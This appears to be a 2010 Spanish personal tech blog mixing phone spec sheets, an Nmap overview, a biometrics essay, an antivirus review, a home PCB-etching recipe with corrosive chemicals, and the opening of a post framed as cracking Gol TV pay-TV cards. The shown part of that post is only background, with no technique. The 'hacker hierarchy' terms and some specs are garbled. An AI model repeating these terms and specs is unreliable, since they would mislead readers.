SISTEMA SO Apple iOS 4.0 con giroscopio AGD (STMicro 33DH 3-axis accelerometer)
Acelerómetro Sí
HARDWARE Memoria RAM 512 MB
Memoria ROM
Memoria disponible 16 GB / 32 GB
Memoria de serie
Tipo de Tarjeta de Memoria N/A
Capacidad Máxima Tarjeta de Memoria (en GB)
Procesador Memoria 1 GHz (Apple A4 ARM Cortex A8)
CONECTIVIDAD USB microUSB
Bluetooth / Wi-Fi / Wi-Fi N 2.1 / Sí / Sí
DLNA / NFC No / No
OFFICE Word Visualizador
Excel Visualizador
PowerPoint Visualizador
PDF Visualizador
Zip -
CONTROL VOZ Marcación por Voz No
Grabación de Voz Sí
Control por Voz Sí
AUTONOMÍA Batería (mAh) 1420
En espera (horas) 300
En conversación (horas) 7
En música (horas) 10
En vídeo (horas) 40
OTROS Extras Disponible en color blanco y negro
Juegos +
Programa PC iTunes 9.2
SAR cabeza W/kg
SAR cuerpo W/kg


Y esto es todo
Hasta otra

martes, 20 de julio de 2010

Nmap


Nmap es un programa de código abierto que sirve para efectuar rastreo de puertos escrito originalmente por Gordon Lyon (más conocido por su alias Fyodor Vaskovich). Se usa para evaluar la seguridad de sistemas informáticos, así como para descubrir servicios o servidores en una red informática.

Características

Descubrimiento de servidores: Identifica computadoras en una red, por ejemplo listando aquellas que responden ping.1
Identifica puertos abiertos en una computadora objetivo.
Determina qué servicios está ejecutando la misma.
Determinar qué sistema operativo y versión utiliza dicha computadora, (esta técnica es también conocida como fingerprinting).
Obtiene algunas características del hardware de red de la máquina objeto de la prueba.

Aplicaciones típicas

Ha llegado a ser uno de las herramientas imprescindibles para todo administrador de sistema, y es usado para pruebas de penetración y tareas de seguridad informática en general.
Como muchas herramientas usadas en el campo de la seguridad informática, es también una herramienta muy utilizada para hacking.
Los administradores de sistema pueden utilizarlo para verificar la presencia de posibles aplicaciones no autorizadas ejecutándose en el servidor, así como los crackers pueden usarlo para descubrir objetivos potenciales.
Nmap permite hacer el inventario y el mantenimiento del inventario de computadores de una red. Se puede usar entonces para auditar la seguridad de una red, mediante la identificación de todo nuevo servidor que se conecte: [1]
Nmap es a menudo confundido con herramientas para verificación de vulnerabilidades como Nessus. Nmap es difícilmente detectable, ha sido creado para evadir los Sistema de detección de intrusos (IDS) e interfiere lo menos posible con las operaciones normales de las redes y de las computadoras que son analizadas.

Entornos de trabajo

Nmap puede funcionar en sistemas operativos como las diversas variables de Unix (Solaris, Mac OS X, y BSD), GNU/Linux y también en otros OS como Microsoft Windows y AmigaOS. [2].

Interfaces gráficas

La interfaz usuario oficial es nmapfe, escrita originalmente por Zach Smith, y Nmap lo integra desde la versión 2.2 [3].
Otras interfaces basadas en navegadores Web existen. Algunos ejemplos son LOCALSCAN [4], nmap-web [5], y Nmap-CGI [6].
NMapW [7] es una interfaz sobre Microsoft Windows escrita por Syhunt.
NMapWin [8] es otra interfaz para Windows. Sin embargo, no ha sido actualizada desde la versión 1.4.0 lanzada en Junio de 2003.
Una plataforma completa Nmap con capacidades para funcionar sobre distintos OS se encuentra en UMIT. Su autor es Adriano Monteiro Marques.

Historia

Nmap apareció en septiembre de 1997, en un artículo de la revista Phrack Magazine. El código fuente venía incluido. [9]
Otros desarrollos incluyeron mejores algoritmos para determinar qué servicios estaban funcionando, reescritura de código de C a C++, se agregaron tipos de scan adicionales y nuevos protocolos como IPv6.
Nmap 3.5 apareció en febrero de 2004, y la versión 4.0 en enero de 2006, con cientos de mejoras.
Los cambios de cada versión se pueden encontrar en el listado de cambios de Nmap.

bueno y esto es todo asta otra chao

martes, 13 de julio de 2010

Biometria

Una nueva área de seguridad física que ha estado ganando popularidad, y cuya
importancia se incrementará exponencialmente a medida que resulte más sencillo
implementarla y su necesidad sea más evidente, es la Biométrica o Bio-Acceso. Acceso
a qué? La Biométrica no es utilizada sólamente en el acceso a edificios o
computadoras, sino que a la brevedad será utilizada para acceder a sus cuentas
bancaria, sus tarjetas de crédito y hasta para realizar una llamada telefónica. La
Biométrica garantiza el acceso basado en la identifiación personal, a través de un
patrón de reconocimiento preprogramado, de manera tal que provee no sólo
identificación, sino también validación. Para que esto pueda funcionar, debemos tener
en mente la teoría de que los rasgos fisiológicos son únicos en cada persona. Les daré
una breve reseña de lo que ocurre cuando un sistema de Biométrica es utilizado.
El proceso de identificación se inicia con un pedido de reconocimiento por parte
de la persona que envía cierta información biológica. Esta es luego comparada con la
existente en la base de datos. La velocidad del proceso depende del tamaño de la base
de datos, tamaño del archivo (generalmente grande), y velocidad de procesamiento de
las computadoras. Las nuevas tecnologías de compresión están reduciendo el tamaño
de estos archivos, permitiendo para una mayor capacidad de proceso una mayor
cantidad de datos a comparar.
En la mayoría de los casos, la Biométrica requiere de contacto físico con partes
del cuerpo. Debido a las posibilidades de transmisión de enfermedades, tecnologías de
escaneo en video y láser están siendo implementadas en muchas aplicaciones de
manera tal de eliminar la necesidad de contacto físico. Con el uso constante de las
computadoras hoy en día, asegurar el acceso y la información ya no es un tema de
negocios solamente, sino que la gente tiene que darse cuenta de que también se trata
de proteger su privacidad.
Hay 7 categorías Biométricas que se aplican hoy en día: huellas dactilares,
geometría de la mano, escaneo de retina, escaneo de iris, geometría facial, verificación
de voz, y verificación de firma. Todas ellas son consideradas parte de la seguridad
biométrica.
El análisis de huellas dactilares es la más antigua y común de todas estas
categorías. Pero ha evolucionado del viejo sistema de tinta y papel. El sistema actual
toma imágenes en video de la huella dactilar y la separa en varios componentes. Los
cantos de la huella son transformados en llaves matemáticas, de manera tal de que
cada huella es realmente una serie de ecuaciones matemáticas. Asimismo, mientras
más huellas se utilicen, más acertado será el proceso de verificación. Pero, obviamente,
esto también implica, duplicar, triplicar y hasta cuadruplicar el tamaño de
almacenamiento necesario para llevar a cabo dicho proceso. La gran resolución de los
sistemas permite llevar a cabo más de estas ecuaciones, lo que redunda en una mayor
exactitud en los resultados. La lectura inicial y almacenaje pueden tomar de 5 a 10
segundos, y la verificación sólo 1 o 2 segundos.
La geometría de la mano es muy similar al sistema de huellas dactilares. En
realidad es una extensión del mismo sistema. Crea ecuaciones matemáticas basadas
usualmente en la altura, el ancho y largo de la mano. Esto puede llevar a un posible
problema con algunos gemelos casi idénticos que tienen el mismo tamaño de mano.
El Escaneo de retina requiere examinar el ojo a una distancia cercana (unos 5
centímetros). Esto es muy intrusivo y es un proceso largo, por lo cual sólo ha sido
aplicado en lugares que tienen grandes requerimientos de seguridad.
El escaneo de iris realiza un mapeo matemático del área del iris (circundante a
la pupila). Con aproximadamente 200 puntos de referencia dentro del iris, es bastante
sencillo de hacer y puede discriminar bastante dependiendo de la cantidad de puntos
que tome como referencia y procesados. Dado que el color del ojo no es un tema a
tener en cuenta, las cámaras en blanco y negro pueden utilizarse en ese sistema, lo
que redunda en un abaratamiento de costos de implementación. Las imágenes tomadas
son almacenadas y comparadas durante el proceso de verificación. Este sistema es
mucho más preciso que el sistema de geometría de mano, ya que miembros de la
misma familia, incluso hermanos idénticos, tendrán diferentes iris.
La geometría de la cara es el resultado del reconocimiento mediante geometría
de mano y de huellas dactilares. Se toman imágenes en video y se seleccionan puntos
faciales como referencia, de manera tal de garantizar el acceso. El uso más común de
este sistema toma como referencia la distancia entre dos puntos de la cara. Otro uso
implica medir los puntos de calor con cámaras infrarrojas (lo que se traduce en un
encarecimiento del sistema). Esto soluciona los problemas ocacionados por objetos
cubriendo la cara de la persona.
La verificación mediante voz se ha estado convirtiendo en algo popular. Analiza
la voz, su velocidad y patrón, y la transforma en una firma digital personal. Muchos
sistemas han sido mejorados al agregar un patrón de palabras para ser utilizadas en la
identificación y confirmación. Este sistema, asimismo, garantiza la ausencia de contagio
de enfermedades, ya que no requiere de ninguna clase de contacto físico.
El reconocimiento de firma divida la firma de una persona en dos partes: una
parte abarca los rasgos que se mantienen, la otra parte los rasgos cambiantes. Este
sistema usualmente requiere de la utilización de plaquetas de costosas plaquetas de
escritura.
Han aparecido muy diversas implementaciones para esta clase de bio-accesos.
Muchas requieren alguna clase de acceso mediante tarjeta, utilizándose alguno de los
métodos arriba detallados a modo de verificación. Este proceso es mucho más rápido,
ya que la computadora sólo debe comparar los datos biométricos de la persona con los
que se encuentran almacenados en la tarjeta para garantizar (o no) el acceso. Futura
tecnología utilizará tarjetas inteligentes en reemplazo de las bases de datos. Dichas
tarjetas contendrán los datos a comparar ellas mismas. Pero se pueden imaginar qué
pasaría si alguien (y ustedes saben que lo harán) puede hackear una de esas tarjetas
inteligentes? La gente podría ser capaz de crear sus propias identidades fácilmente y de
esa manera ganar acceso a lugares restringidos sin demasiado esfuerzo de su parte,
dado que la computadora los dejaría. Y las computadoras nunca mienten, chicos
(perdón…frase de “hacker” idiota. Ya sé…pero tenía que decirlo). Asimismo, la
compatibilidad es un tema a tener en cuenta. Muchos fabricantes de estos sistemas
utilizan diferentes protocolos y debido a ello no se puede disponer de un archivo
“universal” para ser utilizado en todos los sistemas de seguridad en todas
partes…todavía. Pero obviamente esto es algo que el gobierno apoyará no sólo de
palabra sino que también con fondos. Con la posibilidad de mantener las características
únicas de cada persona en archivo (y no mencionemos qué más sería posible) y quizás
hasta ni siquiera necesitar almacenar archivos en sus computadoras, teniendo las
nuevas tarjetas inteligentes, no preferirías hacer eso? Un comité conocido como Bio-API
ha sido formado para tratar de encontarle standards a la idustria. Otros standards
desarrollados por varios desarrolladores industriales, el gobierno y hasta el MIT es el
llamado SVAPI (Speaker Verificacion-API). Existe un software de desarrollo gratuito, el
cual sugiero bajen si están utilizando Win9x o NT.
La Biométrica es de por sí un método tan intrusivo e invasivo que muchos
sostienen que necesita un sistema propio de seguridad. Sin embargo, hasta el momento
no hay regulación ni ley que controle la venta o transferencia de información biométrica
adquirida en marco de legalidad. Esto significa que si ustedes se postulan para un
trabajo y les es requerido un escaneo biométrico, la agencia de control no brinda
ninguna protección para su información privada. Hay en California una petición
pendiente, la AB50, que pretende detener la copia de información biométrica. Otro
asunto de cuidado es la eficiencia de los mencionados sistemas. Son realmente
necesarios? Va a dejar la gente de usar los cajeros automáticos porque se van a hartar
de tener que esperar el escaneo de retina para obtener su dinero debido a algún bug
del sistema? Bueno, elm Centro Nacional de Testeo de Biometría (National Biometrics
Test Center), ha desarrollado standards de testeo para evaluar la performance de los
equipos de acceso biométrico, antes sólo realizado por los fabricantes. La mejor
oportunidad de standarización la tiene la Asociación Nacional de Seguridad de
Computadoras (Nacional Computer Security Association), que ha creado un programa
de certificación para sistemas y componentes de sistemas como ser scanners, que se
encargará de establecer tasas de error basadas en metodos de testeo standarizados.
Ahora, nosotros podemos mirar a esta nueva tecnología de la manera en que
nos plazca. Si es dejada en manos de los sectores privados y de negocios, e
implementado de manera tal de que no discrimine ni elimine las opciones de la gente
para hacer cosas, puede ser algo bueno y un valor agregado para la seguridad de las
personas en sus casas, y para las empresas temerosas del espionaje industrial o
cualquier otra paranoia que tengan. Sin embargo, si se pone esta tecnología en manos
del gobierno, le estaríamos dando aún más poder, que los habilitaría para controlar y
monitorear nuestras vidas. Dependiendo en dónde sean hechos estos sistemas, el
gobierno podría observarnos cuando vamos y venimos de nuestros hogares, nos
conectamos a nuestras computadoras, extraemos dinero del cajero automático y hasta
incluso saber qué clase de películas contratamos con el sistema pay-per-view. Eso, mis
amigos, asusta bastante, y espero no tener que pensar en ello alguna vez como una
realidad.

Sony-Ericsson Vivaz Plata






El nuevo Sony Ericsson Vivaz destaca por su espectacular diseño unido a las más altas prestaciones que puede tener un móvil. Una de sus principales características es su cámara de 8.1 megapíxeles que además permite grabar vídeo en alta definición.

Además con su gran pantalla TFT táctil de 3.2 pulgadas podrás ver tus vídeos y compartirlos con tus amigos vía vía Bluetooth, WIFI, navegación 3G o pasártelos a tu PC a través del cable USB.

cámara: 8,1 megapíxeles
slot de memoria: Micro-SD de 8GB incluida.
cuatribanda: si
marcación por voz: no
cable de datos incluido: si
dimensiones: 107 x 52 x 13 mm
peso: 97gr.
tiempo en conversación: hasta 5 horas
tiempo en espera:hasta 430 horas
pantalla: TFT táctil con 16 millones de colores
tasa absorción (SAR):
acceso a Orange Word: si ¿qué es Orange World?
3Gvídeo llamadamp3manos libresvideo cámararadiowi-figpspantalla táctilorange world

domingo, 11 de julio de 2010

IPhone





El iPhone es un revolucionario teléfono móvil, un iPod todo pantalla con controles táctiles, y un revolucionario dispositivo de comunicación por Internet con eMail a la altura de un ordenador, navegación web, búsquedas y mapas; todo ello integrado en un pequeño y ligero dispositivo de mano. El iPhone estrena una completamente nueva interfaz de usuario basada en una gran pantalla táctil "multi-touch" y en un pionero e innovador software que permite al usuario controlar el iPhone con sólo sus dedos. El iPhone abre además una nueva era de potencia y sofisticación en el software nunca antes vista en un dispositivo móvil, que redefine completamente lo que los usuarios pueden hacer con sus teléfonos móviles. "El iPhone es un revolucionario y mágico producto que está literalmente cinco años por delante de cualquier otro teléfono móvil", dice Steve Jobs, presidente de Apple. "Todos hemos nacido con el más avanzado dispositivo puntero -nuestros dedos- y el iPhone los utiliza para crear la interfaz de usuario más revolucionaria desde el ratón".

General
lanzamiento Junio 2007
bandas de operación GSM 850 / GSM 900 / GSM 1800 / GSM 1900
dimensiones (mm) 115 x 61 x 11,6
peso (gr) 135
volumen (cc) [ información no disponible ]
batería Estándar Li-Ion
tiempo de carga (h) [ información no disponible ]
autonomía en espera (h) [ información no disponible ]
autonomía en conversación (h) 5
certificación tasa específica de absorción (SAR) Si


Diseño
pantalla color Si
tipo de pantalla TFT táctil
interfaz de usuario gráfica Si
interfaz de usuario personalizable Si
colores 16 Millones
resolución (píxeles) 320 x 480
líneas [ información no disponible ]
columnas [ información no disponible ]
joystick Si
softkey No
carcasas intercambiables No
otras características Pantalla de 3,5 pulgadas
Sensor acelerómetro para auto-rotación de la pantalla
Sensor de luz ambiental
Sensor de proximidad
Pantalla multitáctil



Memoria
memoria en SIM 250
memoria en el teléfono [ información no disponible ]
memoria dinámica 4/8 GB memoria interna compartida
llamadas realizadas [ información no disponible ]
llamadas recibidas [ información no disponible ]
llamadas perdidas [ información no disponible ]
memoria sms 4/8 GB memoria interna compartida
memoria aplicaciones java 4/8 GB memoria interna compartida
memoria imágenes 4/8 GB memoria interna compartida
memoria calendario 4/8 GB memoria interna compartida
memoria agenda/tareas 4/8 GB memoria interna compartida
memoria comandos de voz [ información no disponible ]
memoria marcación por voz (números) [ información no disponible ]
memoria recordatorio vocal (segundos) [ información no disponible ]
templates SMS [ información no disponible ]
ampliación de memoria [ información no disponible ]


Organizador
calendario Si
lista de tareas/agenda Si
calculadora Si
reloj Si
alarmas Si
Gestión de Llamadas
vibración en llamada Si
grabación de voz Si
marcación por voz Si
marcación directa por tecla Si
manos libres integrado Si
llamada a emergencias Si
rellamada automática Si
respuesta automática Si


Entretenimiento
cámara integrada Si
resolución 2 MP, 1600x1200 píxeles, video
reproductor de video Si, iPod>
grabación de video Si
melodías [ información no disponible ]
melodías polifónicas Si, MP3
compositor de melodías propias No
salvapantallas Si
editor de salvapantallas No
álbum de fotos Si
juegos java descargables No
juegos [ información no disponible ]
radio fm No
reproductor mp3 Si
otras características Reproductor de video y audio iPod
Editor de imágenes


Sistema Operativo
sistema operativo Max OS X v10.4.8
MIDP No
descarga de aplicaciones java Si


Conectividad
modem integrado No
velocidad [ información no disponible ]
infrarojos No
bluetooth Si
sincronización con pc Si
tipo sincronización con pc Puerto USB 2.0, Bluetooth 2.0 + EDR
sincronización con terminales móviles Si
tipo sincronización con terminales móviles Bluetooth 2.0 + EDR
sincronización remota (SyncML) No
compatibilidad con... Aplicaciones Mac
puerto POP No
otras características Conectividad WiFi 802.11 b/g


Mensajería
mensajes cortos Envio / Recepción / Difusión
mensajes cortos concatenados Si
plantillas SMS [ información no disponible ]
mensajería multimedia MMS
plantillas MMS [ información no disponible ]
email Cliente de correo POP3, SMTP, IMAP4
chat sms No
texto predictivo (T9) No


Internet Móvil
wap No
versión wap [ información no disponible ]
browser wap [ información no disponible ]
gprs Si
clase gprs
hscsd No
otras características Navegador HTML Safari
Google Maps

Este telefono esta bastante completo de echo es uno de los mejores en el mercado en estos momentos

Hasta otra

jueves, 1 de julio de 2010

Ultima version de Avast




La nueva versión de avast! abandona el viejo panel metálico para dejar sitio a una ventana similar a la de los antivirus más conocidos, una interfaz en la que abundan los tonos grises y naranja. Mucho más elegante que antaño, avast! goza ahora de una mejor organización de los menús.

avast! 5 ha cambiado su motor añadiendo funciones muy interesantes. No sólo se mantienen los módulos de protección P2P, web y de mensajería, sino que se añade uno nuevo, el Behavior Shield (o escudo conductual), que controla comportamientos sospechosos por parte de cualquier programa.

Las estadísticas de análisis son muy detalladas y fáciles de consultar, y las opciones permiten modificar cualquier parámetro de avast!. Puedes activar efectos gráficos especiales, habilitar el modo silencioso (o de juego) para evitar que las notificaciones te molesten e incluso retrasar la carga del servicio de avast! en memoria.

avast! 5 es, en muchos sentidos, el mejor antivirus gratuito. El que había sido el punto débil tradicional de avast! -su escasa usabilidad- ha sido resuelto de manera brillante. Y el motor de detección es uno de los mejores en circulación. ¿A qué esperas para proteger tu equipo?

Cambios recientes en avast!:
Integración mejorada con el sistema de restauración de Windows (ahora Avast se auto-repara cuando detecta un fichero corrupto debido al uso de restaurar sistema
Mejoras de rendimiento
Traducido al catalán y al bielorruso
Cambios menores y correcciones
Para utilizar avast! necesitas:
Sistema operativo: WinXP/Vista/7

E probado la ultima version de este antivirus y es muy buena.

Si la quereis descragar podeis hacerlo aqui: Avast

Bueno y esto es todo por hoy hasta otra

domingo, 13 de junio de 2010

Técnica casera de fabricación de circuitos

impresos
Material necesario.
La placa puede ser de fibra de vidrio o baquelita.
La fibra de vidrio es mas cara pero mucho mas resistente y de mas calidad y es la que
recomiendo. No compréis placa ya fotosensibilazada, sale mas caro que
fotosensibilazarla uno mismo.
Para sensibilizar necesitareis barniz fotosensible POSITIV-20 (de Kontak-
Chemie). Lo hay en casi todos las tiendas de electrónica. Con un bote hay para
sensibilizar un montón de circuitos impresos.
También necesitareis: sosa cáustica en escamas (revelador). Lo venden en
droguerías..
Para atacar la placa es necesario: agua fuerte (Salfuman). Agua oxigenada
concentrada (110 Volúmenes).También necesitareis acetona (un litro vale unas
400 ptas., se la podéis robar a la parienta que la usa para limpiarse las uñas).
Para hacer el barniz protector necesitareis comprar "perrubia" (nombre técnico:
colofonia). Es sólido a temperatura ambiente. La colofonia se usa para hacer
barnices y lacas. Es muy barata.
Preparación de la placa:
Lo primero es dejar la placa como un espejo (por el lado del cobre, ojo) limpia
de polvo y grasa. Una vez cortada al tamaño deseado se va a la pila y se lava
usando estropajo de aluminio y VIM-Clorex (o equivalente). Frotar
enérgicamente hasta que quede como los chorros del oro. No tocar con los
dedos. Secar con papel absorbente. Debe quedar una superficie especular.
En semi-oscuridad (sin que entren los rayos del sol, a la luz de la lampara roja)
colocar sobre la mesa con el cobre hacia arriba. (Previamente aconsejo cubrir
toda la mesa con papel de periódico porque el barniz fotosensible mancha
mucho). Pues bien, cogéis el POSITIV-20 y pulverizáis a unos 20 cm de
distancia hasta que veáis la placa impregnada. La impregnación debe ser
uniforme, con el tiempo os haréis maestros. A continuación cogéis el secador de
pelo de vuestra señora, hermana o madre (según se tercie) y procedéis a arrojar
aire caliente a la placa. El chorro debe barrer la placa continuamente a unos 20
cm de distancia. El objeto del proceso es darle un secado superficial. Con tres o
cuatro minutos basta. Después apagáis la luz roja y dejáis la placa secarse un día
entero en oscuridad. Al cabo de ese día la podéis guardar en una bolsa de
plástico negro opaca para usarla mas adelante.
POSITIVADO:
Cogéis el fotolito y lo colocáis encima del cobre ya sensibilizado. Hacéis que el
contacto sea intimo, para eso recomiendo poner el conjunto placa-fotolito entre
dos hojas de cristal pegados con bisagras (las bisagras las pegáis al cristal con
araldit). Así, este "sándwich" lo lleváis a la insoladora. Si no tenéis insoladora,
no problem: 3 minutos a sol radiante y ¡voila! (mas barato imposible). Si os
encontráis con un día nublado simplemente en un flexo con una bombilla azul de
100W lo acercáis al cristal donde tenéis la placa y 5 minutos y listo.
REVELADO:
Previamente cogéis unos 100 gramos de escamas de sosa cáustica y las ponéis
en un tarro de cristal de mayonesa o similar. Con cuidado, cubrís con agua. La
sosa reacciona con el agua y aquello se pone mas caliente que las pistolas del
coyote así que mucho cuidado. Y sobre todo cuidado con los ojos. Usad gafas
protectoras y guantes de goma. Obtenéis una solución lechosas superconcentrada
de sosa cáustica. Esto será el revelador. Procurad que este liquido
no toque la placa sensibilizada porque os cargáis la emulsión. Vale, en
semioscuridad con luz roja, cogéis una cubeta de plástico como las que se usan
para revelado de fotos (las venden en las tiendas de los 20 duros) y ponéis dos
dedos de agua. Cogéis un cuentagotas y ponéis pues 50 gotas de solución de
sosa en esa cubeta. Cogéis la placa y con el cobre hacia arriba la sumergís en la
cubeta. Sin tocar la emulsión, moved la cubeta para que el liquido bañe la placa.
Si al cabo de unos dos minutos no sale nada sacad la placa lavadla al chorro del
grifo y con el cuentagotas les ponéis otras 10 gotas a la cubeta. Vuelta a
sumergir la placa. Si sigue sin salir nada otra vez lo mismo hasta que empiece a
salir la imagen. Si la solución se os va de la mano y la imagen sale muy rápida
agregad agua a la cubeta. En cuanto hagáis dos circuitos cogeréis la técnica. Si
habéis sido cortos en el tiempo de insolación veréis que no se eliminan restos de
imprimación por mucho que la placa siga en la cubeta. Podéis probar a frotar
con el dedo dentro de la cubeta con mucho cuidado. Al final la imagen debe
quedar correctamente formada. Una vez sacada la placa de la cubeta la laváis al
chorro de agua del grifo y esperáis que se seque a temperatura ambiente.
Cuidado que la emulsión húmeda es muy sensible a roces.
RETOCADO;
Si veis que alguna pista se ha cortado lo mejor es volver a limpiar la placa y
repetir el proceso. Si es muy poco lo dañado podéis retocar la pista rota con un
rotulador de tinta EDING T-25. Esta tinta resiste todo. De venta en papelerías.
ATACADO:
Esto es lo mas emocionante. Recordad que debéis usar ropa apropiada, guantes
de goma y gafas protectoras). Cogéis un vaso de 100 ml de agua del grifo y lo
ponéis en otra cubeta. Añadís otro vaso de agua fuerte y otro vaso de agua
oxigenada. Sumergís la placa y en un minuto zas! ya esta la placa atacada. Las
medidas dependen del tamaño de la cubeta y de la placa, con practica
aprendereis a usar lo menos posible con el fin de ahorrar principalmente al agua
oxigenada que es lo mas caro.
Cogéis la placa ya atacada y con un algodón impregnado en acetona (o alcohol
normal) y limpiáis los restos no atacados de imprimación. La enjuagáis y secad
con mas papel absorbente.
BARNIZADO:
No compréis ningún barniz profesional soldable, para eso esta la
"perrubia" que es más barata y deja un buen resultado. Cogéis una piedra
de perrubia y la ponéis en otro frasco de vidrio. Cubridla con acetona. Al
rato tenéis un barniz numero uno en USA. Un algodoncito sumergido en
este barniz lo pasáis por la placa y no se oxidará nunca jamas.
Lo demás ya lo sabéis, taladrado, etc..

miércoles, 9 de junio de 2010

Truco: Manos libres iPhone sin Bluetooth

Hace poco descubrí un pequeño truco que puede ser aplicado con el iPhone; como utilizarlo de manos libres en nuestro coche sin tener el bluetooth activado.
Si, tal cual como suena. Qué necesitamos para ello?:
- Un coche (evidente)
- Tener una toma stereo para conectar el iPhone con los altavoces del coche.
Los pasos a seguir son:
1. Conectamos el terminal a la toma stereo del coche.
2. Hacemos una llamada con el teléfono conectado.
3. Hablamos por el teléfono y sorpresa! escucharemos las conversaciones a través de los altavoces del coche con total calidad.
Lo que más me sorpredió de todo no es que podamos escuchar a nuestro interlocutor; puesto que el sonido está saliendo a través de la toma stereo. Sino más bien la calidad con la que nos escuchan al otro lado; tal vez, cuando compramos un coche, que tiene como extra el manos libres de teléfono, el micrófono está pre instalado de serie, y por eso se nos escucha tan bien.

sábado, 29 de mayo de 2010

Rango hacker

Hoy tratare la Jerarquia del mundo hacker

Bien como todos sabreis ser hacker, no es tarea para cualquiera persona y no cualquiera puede ser hacker. Como digo yo: saber manejar el google no te hacer ser una persona que sabe andar por internet al igual que que controlar cuatro cosas de un ordenador no te hace ser un hacker.

Jerarquia hacker:

Los hackers se dividen en 4 grupos:

1º grupo: Script Kiddies/ Lambber= Este es el grupo mas bajo que existe en la comunidad hacker a este grupo pertenecen las personas que descargan programas y piratean en linea en otras palabras (Pateticos Usuarios)

2º grupo: Newbie= Los que pertenecen a este grupo son los hackers principiantes o novatos es decir personas que tiene conocimientos de el manejo de los ordenadores y los sistemas de hackeo y rebiente de los ordenadores o redes

3º grupo: Hackers= En este grupo estan los autenticos hackers para concretar mas los que llegan hay saben todo lo necesario para hackear con exito un orednador o red

Este grupo de divide en dos grupos o subgrupos:

los "hat black" tambien llamados sombreros negros que en otras palabras son los hacker que aplican sus conocimientos de la informatica para dañar, burlar o reventar las estructuras de la red o los ordenadores

los "hat white" tambien llamados sombreros blancos que son los hacker que protejen la informatica de los atacades de los sombreros negros y aplican sus conociminetos para hacer mas seguro internet

4º grupo: Gurus= Este es el escalon mas alto de los hacker en el estan los mas grandes hacker del mundo en otras palabras aqui solo estan los mejores de los mejores. Hacker capaces de burlar la seguridad de los organimos mas seguros del mundo y capaces de borrar todo rastro de sus ataques

Bueno y esto seria todo es el mundo de los hacker de los ordenadores ya que tambien hay hacker de otras especialidades como:

La telefonia= "Phonefear"
Los atakes bancarios= "Phigin"
Los creadores de virus= "GusanFear"
Los especialistas en penetrar en los ordenadores="Piratas Informaticos"

bueno y esto es todo espero que os guste si no dadme sugerencias estoy abierto a todo

un saludo

viernes, 28 de mayo de 2010

Hackear Gol Tv /Spain -I+D+I project -

Con el formato estandard de encriptacion comenzamos este mini workbench acerca del standard de seguridad empleado por GOL TV SPAIN via TDT, obeservaremos cuanto tardamos en resolver el algoritmo...

Este mini workbench no trat de pirateria ya que no tengo parche, solo conocimientos infimos de programacion y varios ...

Señores del futbol: "que cada palo aguente su vela", desde aqui el descargo de responsabilidad que allá cada cual con lo que hace y lo que ve, a mi, nisiquiera me gusta el futbol, lo que me encantan son los sistemas encriptados....

Todo tipo de consulta será bien recibida...

Comenzemos:



Mini WorkBench de como hackear o piratear las tarjetas de GOL TV ESPAÑA SPAIN de futbol


Introduccion:

La plataforma de pago Dhalia TV y Mediapro se han puesto de acuerdo para explotar la TDT de pago el año que viene y el precio será de 19 euros incluyendo 3 canales, uno de ellos Gol TV con fútbol de la liga española y también 2 canales de entretenimiento, uno nacional y el otro internacional. Según el presidente de Dahlia TV, el éxito de esta plataforma será el fútbol: “Cuando esté todo en marcha, gracias al acuerdo firmado, Mediapro recibirá de nosotros unos 150 millones al año, que es una buena parte de los 650 millones que les tienen que pagar a los clubes”.

De esta manera es muy posible que Digital + se quede sin fútbol, ya que estos partidos se ofrecerán, al parecer, desde un euro y si este sistema funciona como lo hace en Suecia, Portugal, Reino Unido, Holanda o Francia, se podrían comprar los partidos enviando un SMS. Así que si esto es finalmente así, ya me veo a los de Digital + y a las plataformas de pago por ADSL quedarse sin clientes, porque muchos son los que se abonan únicamente por el fútbol.

De todas las cadenas, la que parece apostar más fuerte es LaSexta ya que a los 2 canales que tiene actualmente se sumarían cuatro más y lo que tienen claro es que van a lanzar uno en alta definición (HD), un sistema que de momento sólo está seguro para TVE a partir del 2010.

Todavía falta tener fecha definitiva para la TDT de pago, aunque algunos dicen, los más optimistas e interesados en sacar partido, que se aprobará el próximo 15 de mayo y eso quiere decir que dentro de nada, muchos ya estarán pagando algún recibito más al mes.




¿Qué receptor se necesita realmente para la TDT de pago?

El debate ahora ya no es el apagón analógico. Ahora lo más importante es cómo quedar bien con la TDT de pago. Este concepto, muy necesario, sin embargo puede retrasar aún mas no la cobertura de las señales, pero si la adaptación de la TDT por parte de los usuarios, ya que, en estos momentos, nadie sabe por donde van a tirar.

Está claro que debemos o se deben, adaptar ya, todos los afectados. Pero dicho esto, no tienen claro que descodificador comprar. Conscientes de esto, podemos aclararle algunas de sus dudas. Si a usted no le interesa pagar por nada en la televisión, y por lo tanto quiere continuar viendo la autonómica, generalistas y privadas sólo necesita un receptor del tipo Zapper. Son los denominados adaptadores para ver la TDT, cambiar de canal y ver.

Si por el contrario está deseando que llegue la TDT de pago y quiere estar preparado desde el primer día, le sugerimos que compre un receptor TDT HD con Lector de tarjeta y CI para CAM externa. Con estos elementos, usted estará preparado para el futuro más cercano, la TDT de pago. Estos receptores son más caros pero son los únicos que funcionan para ello. Además debe exigir el sistema MHP si al final se deciden a emplearlo masivamente todas las cadenas. Entonces habría que buscar más información en su momento.

También puede resultar que algunos canales utilicen su propio descodificador y, necesitarán de una red de distribución, para suministrar sus descodificadores específicos.

¿Qué ha pasado con los consumidores que se adelantaron y compraron televisores adaptados para ver la TDT, sin lectores de tarjeta y CI para CAM externa y, para aquellos otros que compramos los receptores de 30 euros o un poco más, que tampoco traen esos elementos? Simplemente que nos ha tomado el pelo nuestro Gobierno, con las medidas tomadas en el último Consejo de Ministros.

Nos parece muy bien que le otorguen la licencia de la TDT de pago a la empresa que ellos crean más conveniente, lo que no nos parece tan bien es que nos hayan tomado el pelo a casi toda una nación, al no advertir que con los televisores con la TDT integrada y los descodificadores que estábamos adquiriendo, no podremos ver, si se nos antoja la TDT de pago.

Yo aconsejaría, por el momento no comprar ningún tipo de cacharro, sea del tipo que sea, porque se puede quedar en eso, en un “cacharro inútil”, para guardarlo en el ropero y el gasto ocasionado nadie te lo va a resarcir.





La PCMCIA (CAM) de GolTV, como funciona...

Conoce cómo funcionan los módulos CAM (PCMCIA)
¿Qué significa Common Interface (CI)? ¿O cómo funcionarán los módulos CAM que se venderán junto con las tarjetas de Gol TV?


Son probablemente algunas de las preguntas que más frecuentemente se han hecho los aficionados al fútbol en las últimas semanas, conceptos que han aparecido en la prensa, y que todavía en España son para muchos desconocidos. La llegada de la TDT de pago cambiará esto. Conoce qué es qué en la nueva TDT de pago.
